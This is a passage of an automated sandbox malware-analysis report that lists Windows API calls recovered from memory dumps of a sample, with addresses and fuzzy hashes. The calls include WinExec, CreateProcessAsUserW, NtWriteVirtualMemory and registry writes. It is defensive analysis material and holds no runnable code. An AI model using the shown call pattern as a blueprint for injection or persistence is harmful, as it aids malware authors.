                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                  • Opcode ID: ec3d1e85cc845976fc4aabb9747865341fb968514962d9527a67c0b092ef5cfb
                                                                                                                  • Instruction ID: b07a23fb58b07a0ff5327771a3b9ae2bf38aa4b3259aa5cd075ab45971831ae2
                                                                                                                  • Opcode Fuzzy Hash: ec3d1e85cc845976fc4aabb9747865341fb968514962d9527a67c0b092ef5cfb
                                                                                                                  • Instruction Fuzzy Hash: D211E5B26C0248AFEB90EFA9DC45F9A77EDEB1D740F91A410FA08D7640D634ED509B24
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02E78624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: e8bcb07740aed0b26dfad5649ebf3d3d3cbf6119036b351f32591ff962e6bb3c
                                                                                                                  • Instruction ID: 9fb6fc1609518db5c49bdaa588f38608f559eb07073c62ccdfefb5b6835fc38f
                                                                                                                  • Opcode Fuzzy Hash: e8bcb07740aed0b26dfad5649ebf3d3d3cbf6119036b351f32591ff962e6bb3c
                                                                                                                  • Instruction Fuzzy Hash: 1B0181706C4244BFEB50EBE5EC0AF6A77EDE719700F90E420F904D6640E630AE10AB24
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02E78624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: 431a010676fe7d4d1a3200bcb858aefd3db06cb622fbc1b1739b59af50fa50a6
                                                                                                                  • Instruction ID: 10dc342f9362b60502e5c176199e6f5d0f6ebc4a179f42503afb46146b9a9ab0
                                                                                                                  • Opcode Fuzzy Hash: 431a010676fe7d4d1a3200bcb858aefd3db06cb622fbc1b1739b59af50fa50a6
                                                                                                                  • Instruction Fuzzy Hash: C9F081706C4244BFEB50EBE5EC0AF5A77ADE719700F90E420F904D6640D630AE10AB24
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75C88
                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75CB6
                                                                                                                    • Part of subcall function 02E67D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02E73900,02E75CF6,00000000,02E75D74,?,?,02E73900), ref: 02E67DAA
                                                                                                                    • Part of subcall function 02E67F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02E73900,02E75D11,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E67FB7
                                                                                                                  • GetLastError.KERNEL32(00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75D1B
                                                                                                                    • Part of subcall function 02E6A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02E6C3D9,00000000,02E6C433), ref: 02E6A797
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 503785936-0
                                                                                                                  • Opcode ID: a55ab120749cc91ec680d7ea34536145aaff067cfe6f438a39f48dee97b8a9f1
                                                                                                                  • Instruction ID: bba43dedcfef7243ab449912390bd876c89a031289eda3ac45124309f7fb1e0c
                                                                                                                  • Opcode Fuzzy Hash: a55ab120749cc91ec680d7ea34536145aaff067cfe6f438a39f48dee97b8a9f1
                                                                                                                  • Instruction Fuzzy Hash: 0D318E70EC02059FDB00EBA8C885BFEBBE6AB09704F90D465E904AB380D77559058FA1
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02FDBA58), ref: 02E7F258
                                                                                                                  • RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F290
                                                                                                                  • RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: 0df0573721d0dfccf5aec52b742421a468383437c63f9405e0b9cd411c73c116
                                                                                                                  • Instruction ID: a4c672fb7c06053d3d1589ea41ab8468528ea661a1e9f0c4bbbb5edfd7ee08eb
                                                                                                                  • Opcode Fuzzy Hash: 0df0573721d0dfccf5aec52b742421a468383437c63f9405e0b9cd411c73c116
                                                                                                                  • Instruction Fuzzy Hash: CE114F716C4248AFEB11EFA8D885EAD77EDEB09780F41A861B904D7690DB30EE408F54
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02FDBA58), ref: 02E7F258
                                                                                                                  • RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F290
                                                                                                                  • RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: bbe2f113fbd2a4606ed88cbfab7c6133bec17aeaec0e2906661b9dd109ce737f
                                                                                                                  • Instruction ID: 44bb5b0c4cf7e415717a6b853b1985909ab492e66e355f24ec3f76c3ff3524b9
                                                                                                                  • Opcode Fuzzy Hash: bbe2f113fbd2a4606ed88cbfab7c6133bec17aeaec0e2906661b9dd109ce737f
                                                                                                                  • Instruction Fuzzy Hash: D01151716C4248AFDB11EFA8D885EAD77EDEB09780F41A861F904D7690DB30EE408F54
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 448eabfc1773de6490391a95a067d1b3f0c4843071686f05f6494e2094f6bd2f
                                                                                                                  • Instruction ID: 9dc736b6ab787649cd6ec6b07d4828277abc33789bc2e6b2c00f2ec76e703034
                                                                                                                  • Opcode Fuzzy Hash: 448eabfc1773de6490391a95a067d1b3f0c4843071686f05f6494e2094f6bd2f
                                                                                                                  • Instruction Fuzzy Hash: AFF0A9287D8100C78B20BB398C8CEB9279A9F443C472CF836B4469F2C9DB648C45CB62
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E
                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02E64D5B
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02E64D6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 986138563-0
                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction ID: 59c65f1d32bed6d8ed4b25dbd1bc501958df6d39ba1df8e73eeba99e9fc849de
                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction Fuzzy Hash: E4E0ECB82C52055EFA266F219948B76262AAFD27C8B14E499A804CE294D7389440AD78
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02E773DA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                  • Opcode ID: 37785ba504537bc6b1bd0e4d2b68cb0c3548f2df1d49ceaad6bb3ff865d2780b
                                                                                                                  • Instruction ID: 253c87f8686d63f46452cb1150ad7dfaf22346aa344d5f5f316af50eac184cf2
                                                                                                                  • Opcode Fuzzy Hash: 37785ba504537bc6b1bd0e4d2b68cb0c3548f2df1d49ceaad6bb3ff865d2780b
                                                                                                                  • Instruction Fuzzy Hash: 2EB1E274A81608AFDB14CF99D480AADFBF2FF8A314F24D169E855AB364D730A845CF50
                                                                                                                  APIs
                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02E6E781
                                                                                                                    • Part of subcall function 02E6E364: VariantClear.OLEAUT32(?), ref: 02E6E373
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 274517740-0
                                                                                                                  • Opcode ID: 0d39c5b8f33b5735318407ed4a0d637f0fb52a679703c0daeb0212005e0835ea
                                                                                                                  • Instruction ID: 04ab7c86f73148506909356a89c735352e60ee10cbfdc9d37f5941b1e14f13c7
                                                                                                                  • Opcode Fuzzy Hash: 0d39c5b8f33b5735318407ed4a0d637f0fb52a679703c0daeb0212005e0835ea
                                                                                                                  • Instruction Fuzzy Hash: 4A11A3287D021087C730AF29C8CCE76379AAF457D071CF426F54A8B285DB30DC41CA61
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1927566239-0
                                                                                                                  • Opcode ID: c0fb14d3c0cab1041fc67d6c17d64d8d44b8c8eb9e5db7c22b9824474054c82d
                                                                                                                  • Instruction ID: fed8add58de757acf7ecfa7d36d29f76876070de6950532bd79dada2892e537f
                                                                                                                  • Opcode Fuzzy Hash: c0fb14d3c0cab1041fc67d6c17d64d8d44b8c8eb9e5db7c22b9824474054c82d
                                                                                                                  • Instruction Fuzzy Hash: 913160796C42089BDB10DEB8C88CEBA77A8EB0C284F48A461F905D75C0D734D950CBA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                    • Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC
                                                                                                                    • Part of subcall function 02E78338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4
                                                                                                                  • FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1478290883-0
                                                                                                                  • Opcode ID: d090bef770af2ac62f408f57beef927fcb452146abd87eb1aea7afdfde770f01
                                                                                                                  • Instruction ID: 7cdcf7f1f70324849bf3628404e3f48b9ce14979b7ee14c19ae62f8c182f3f20
                                                                                                                  • Opcode Fuzzy Hash: d090bef770af2ac62f408f57beef927fcb452146abd87eb1aea7afdfde770f01
                                                                                                                  • Instruction Fuzzy Hash: 762124706C0300AFFB90FBB5DC0AB6EB79A9B05B40F50F460B605E76C0DA74A9409B19
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02E76DB9,?,?,?,00000000), ref: 02E76D99
                                                                                                                    • Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4225568880-0
                                                                                                                  • Opcode ID: f59306b0b2a31c188f9dc0d53acbdb95b6803c6a2c399d3d36b84d42e5c79eca
                                                                                                                  • Instruction ID: 53bf0c521094a70b697c3d6b37a79b3b42bbaac58c5afb53454e9fcba83dfdfe
                                                                                                                  • Opcode Fuzzy Hash: f59306b0b2a31c188f9dc0d53acbdb95b6803c6a2c399d3d36b84d42e5c79eca
                                                                                                                  • Instruction Fuzzy Hash: 83E0E5356D06087FE321FB62DC41DAE77AEDB8B784B51A4B1F50093640D9316D008860
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E65886
                                                                                                                    • Part of subcall function 02E65ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E60000,02E8E790), ref: 02E65AE8
                                                                                                                    • Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B06
                                                                                                                    • Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B24
                                                                                                                    • Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E65B42
                                                                                                                    • Part of subcall function 02E65ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E65B8B
                                                                                                                    • Part of subcall function 02E65ACC: RegQueryValueExA.ADVAPI32(?,02E65D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001), ref: 02E65BA9
                                                                                                                    • Part of subcall function 02E65ACC: RegCloseKey.ADVAPI32(?,02E65BD8,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E65BCB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2796650324-0
                                                                                                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                  • Instruction ID: ad9452202b05527134687230de0a7e05b58119da9464cca79ab25a154086efaf
                                                                                                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                  • Instruction Fuzzy Hash: DBE06D71A803148FCB10DE98C8C4B6633D8AB08794F449961EC58CF346D7B1DD108BE0
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02E67DF4
                                                                                                                  Memory Dump Source
